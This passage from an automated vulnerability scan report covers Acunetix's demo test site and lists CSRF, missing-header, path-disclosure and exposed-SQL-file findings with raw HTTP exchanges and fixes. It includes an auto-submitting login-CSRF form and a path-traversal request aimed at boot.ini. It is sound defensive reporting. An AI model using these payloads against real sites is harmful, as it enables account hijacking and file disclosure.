Response Time (ms) : 4091.3786

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
ackground-color:#F5F5F5">03.29.1970, 5:01 pm</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="anonymous user">
			<textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea>
			<br>
			<input type="submit" name="submit" value="add
…

Show Remediation Hide Remediation

Remedy

Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
- For native XMLHttpRequest (XHR) object in JavaScript;
```
xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL');
```
  For JQuery, if you want to add a custom header (or set of headers) to
  a. individual request
```
$.ajax({
    url: 'foo/bar',
    headers: { 'x-my-custom-header': 'some value' }
});
```
  b. every request
```
$.ajaxSetup({
    headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
    beforeSend: function(xhr) {
        xhr.setRequestHeader('x-my-custom-header', 'some value');
    }
});
```

External References

OWASP Cross-Site Request Forgery (CSRF)

Remedy References

OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet

CLASSIFICATION

HIPAA

17. [Possible] Cross-site Request Forgery in Login Form

LOW

Acunetix 360 identified a possible Cross-Site Request Forgery in Login Form.

In a login CSRF attack, the attacker forges a login request to an honest site using the attacker’s user name and password at that site. If the forgery succeeds, the honest server responds with a Set-Cookie header that instructs the browser to mutate its state by storing a session cookie, logging the user into the honest site as the attacker. This session cookie is used to bind subsequent requests to the user’s session and hence to the attacker’s authentication credentials. The attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.

Impact

In this particular case CSRF affects the login form in which the impact of this vulnerability is decreased significantly. Unlike normal CSRF vulnerabilities this will only allow an attacker to exploit some complex XSS vulnerabilities otherwise it can't be exploited.

For example;

If there is a page that's different for every user (such as "edit my profile") and vulnerable to XSS (Cross-site Scripting) then normally it cannot be exploited. However if the login form is vulnerable, an attacker can prepare a special profile, force victim to login as that user which will trigger the XSS exploit. Again attacker is still quite limited with this XSS as there is no active session. However the attacker can leverage this XSS in many ways such as showing the same login form again but this time capturing and sending the entered username/password to the attacker.

In this kind of attack, attacker will send a link containing html as simple as the following in which attacker's user name and password is attached.

<form method="POST" action="http://honest.site/login">
  <input type="text" name="user" value="h4ck3r" />
  <input type="password" name="pass" value="passw0rd" />
</form>
<script>
    document.forms[0].submit();
</script>

When the victim clicks the link then form will be submitted automatically to the honest site and exploitation is successful, victim will be logged in as the attacker and consequences will depend on the website behavior.

Search History

Many sites allow their users to opt-in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user’s interests and activities and could be used by the attacker to embarrass the user, to steal the user’s identity, or to spy on the user. Since the victim logs in as the attacker, the victim's search queries are then stored in the attacker’s search history, and the attacker can retrieve the queries by logging into his or her own account.
Shopping

Merchant sites might save the credit card details in user's profile. In login CSRF attack, when user funds a purchase and enrolls the credit card, the credit card details might be added to the attacker's account.

Vulnerabilities

17.1. http://testphp.vulnweb.com/login.php

Form Name(s)

loginform

Certainty

Request Response Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2050.5176

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
ntent -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<div class="story">
	<h3>If you are already registered please enter your login information below:</h3><br>
	<form name="loginform" method="post" action="userinfo.php">
	<table cellpadding="4" cellspacing="1">
		<tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr>
		<tr><td>Passwo
…

Show Remediation Hide Remediation

Remedy

Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
- For native XMLHttpRequest (XHR) object in JavaScript;
```
xhr = new XMLHttpRequest();
xhr.setRequestHeader('custom-header', 'valueNULL);
```
  For JQuery, if you want to add a custom header (or set of headers) to
  a. individual request
```
$.ajax({
    url: 'foo/bar',
    headers: { 'x-my-custom-header': 'some value' }
});
```
  b. every request
```
$.ajaxSetup({
    headers: { 'x-my-custom-header': 'some value' }
});
OR
$.ajaxSetup({
    beforeSend: function(xhr) {
        xhr.setRequestHeader('x-my-custom-header', 'some value');
    }
});
```

External References

Remedy References

OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet

CLASSIFICATION

HIPAA

18. Missing X-XSS-Protection Header

BEST PRACTICE

Acunetix 360 detected a missing X-XSS-Protection header which means that this website could be at risk of a Cross-site Scripting (XSS) attacks.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.

Vulnerabilities

18.1. http://testphp.vulnweb.com/

Certainty

Request Response Go to the highlighted output

Request

GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 199.9404

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:01:05 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>Home of Acunetix Art</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook
…

Show Remediation Hide Remediation

Remedy

Add the X-XSS-Protection header with a value of "1; mode= block".

```
X-XSS-Protection: 1; mode=block
```

External References

CLASSIFICATION

HIPAA

19. [Possible] Internal Path Disclosure (*nix)

INFORMATION

Acunetix 360 identified a Possible Internal Path Disclosure (*nix) in the document.

Impact

There is no direct impact; however, this information can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.

Vulnerabilities

19.1. http://testphp.vulnweb.com/showimage.php?file=.%2fpictures%2f1.jpg%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini&size=160

Method	Parameter	Value
GET	file	./pictures/1.jpg/../../../../../../../../../../boot.ini
GET	size	160

Identified Internal Path(s)

/tmp/:/proc/

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=.%2fpictures%2f1.jpg%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 1697.4776

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:21:48 GMT


Warning: fopen(): open_basedir restriction in effect. File(./pictures/1.jpg/../../../../../../../../../../boot.ini) is not within the allowed path(s): (/hj/:/tmp/:/proc/) in /hj/var/www/showimage.php on line 19

Warning: fopen(./pictures/1.jpg/../../../../../../../../../../boot.ini): failed to open stream: Operation not permitted in /hj/var/www/showimage.php on line 19

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 25

Show Remediation Hide Remediation

External References

OWASP - Full Path Disclosure

CLASSIFICATION

HIPAA

20. [Possible] SQL File Detected

INFORMATION

Acunetix 360 detected a possible SQL file.

Vulnerabilities

20.1. http://testphp.vulnweb.com/admin/create.sql

Certainty

Request Response Go to the highlighted output

Request

GET /admin/create.sql HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/admin/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 1314.4591

Total Bytes Received : 238

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
Connection: keep-alive
Content-Length: 523
Last-Modified: Wed, 11 May 2011 10:27:48 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 29 Mar 1970 16:02:51 GMT
ETag: "4dca64a4-20b"

create database waspart;
use waspart;

CREATE TABLE IF NOT EXISTS forum(
	sender 		CHAR(150),
	mesaj 		TEXT,
	senttime	INTEGER(32));
	
CREATE TABLE IF NOT EXISTS artists(
	artist_id	INTEGER(5) PRIMARY KEY AUTO_INCREMENT,
	aname		CHAR(50),
	adesc		BLOB);
	
CREATE TABLE IF NOT EXISTS categ(
	cat_id		INTEGER(5) PRIMARY KEY AUTO_INCREMENT,
	cname		CHAR(50),
	cdesc		BLOB);
	
CREATE TABLE IF NOT EXISTS pictures(
	pic_id		INTEGER(5) PRIMARY KEY AUTO_INCREMENT,
	pshort		BLOB,
	plong		TEXT,
	price		INTEGER,
	img			CHAR(50));

Show Remediation Hide Remediation

Remedy

You should manually investigate the found URL.

CLASSIFICATION

HIPAA